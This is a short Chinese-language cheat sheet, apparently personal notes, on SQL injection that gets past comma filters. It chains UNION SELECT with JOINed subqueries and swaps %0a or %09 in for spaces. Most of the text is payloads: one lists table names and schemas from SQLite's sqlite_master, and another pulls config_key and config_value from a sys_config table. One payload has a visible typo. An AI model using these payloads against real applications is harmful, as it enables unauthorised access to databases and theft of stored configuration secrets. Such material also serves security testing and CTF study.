SQL”,”号绕过

标签(空格分隔): SQL绕过

join注入:当,被过滤的时候可以使用该方法

1
2
3
4
5
6
7
8
9
10
SELECT *
FROM users
UNION
SELECT *
FROM (
(SELECT 1) A
JOIN (SELECT 2) B
JOIN (SELECT 3) C
JOIN (SELECT 4) D
);

此时空格被过滤的化可以使用%0a(URL编译)和%09(水平换行)
https://blog.csdn.net/qq_61778128/article/details/123205490

sqlite注入查表

1
2
3
4
5
6
7
8
9
1	
union
select	*
from	
(select	1)	a	
join	(select	2)	b	
join	(select	3)	c	
join	(SELECT	name	FROM	sqlite_master)	d	
join	(select	SELECT	sql	FROM	sqlite_master)	f

找到后

1
2
3
4
5
6
7
8
1	
union	select	*	
from	
(select	1)	a	
join	(select	2)	b	
join	(select	3)	c	
join	(SELECT	config_key	FROM	sys_config)	d	
join	(SELECT	config_value	FROM	sys_config)	f`